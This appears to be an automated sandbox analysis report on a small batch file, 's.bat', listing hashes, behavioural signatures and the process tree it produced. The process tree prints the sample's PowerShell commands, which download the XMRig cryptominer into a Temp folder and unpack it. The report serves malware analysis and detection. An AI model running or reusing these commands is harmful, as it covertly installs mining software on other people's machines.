Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-12-2024 15:10
Behavioral task
behavioral1
Sample
s.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
s.bat
Resource
win10v2004-20241007-en
General
-
Target
s.bat
-
Size
1KB
-
MD5
1e64009a55d5a9eb64fd903f621e5ae0
-
SHA1
0e5de7ecc2363d16ac2ae8f244d895cff70d6cdb
-
SHA256
c5845905301cb177cd5ba386ab909a43ed5263ddbbc470ab0da8ef8c8bc82abf
-
SHA512
2b28221714861951beeb73247a7ab58f4e68d3510e030d25787a13c6c715cea2b82d51cb1f262736dde8738e9ceb59420b4d4dc724524ece75a6a13978da8695
Malware Config
Signatures
-
pid Process 2380 powershell.exe 2632 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2732 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2380 powershell.exe 2632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2544 wrote to memory of 2380 2544 cmd.exe 31 PID 2544 wrote to memory of 2380 2544 cmd.exe 31 PID 2544 wrote to memory of 2380 2544 cmd.exe 31 PID 2544 wrote to memory of 2732 2544 cmd.exe 32 PID 2544 wrote to memory of 2732 2544 cmd.exe 32 PID 2544 wrote to memory of 2732 2544 cmd.exe 32 PID 2544 wrote to memory of 2632 2544 cmd.exe 34 PID 2544 wrote to memory of 2632 2544 cmd.exe 34 PID 2544 wrote to memory of 2632 2544 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\s.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\system32\timeout.exetimeout /t 102⤵
- Delays execution with timeout.exe
PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c5993a888268398fc07aaea6a814c6f3
SHA12aea2eff6623a09bf97f5abb876a02ab68ff4439
SHA256c2c763f42b7a5d0a2597db82cd0dfa1fd52c3c27dc57654ec5d25235f3800d13
SHA51251acf1a9ecd35aa777a146a4fd231ebbb7c34a4a53251c7adb25fb3bcd1fb0f6527629ca97d5450784fac70efabda5eaf794d3905842745f440c6ddbb966cec8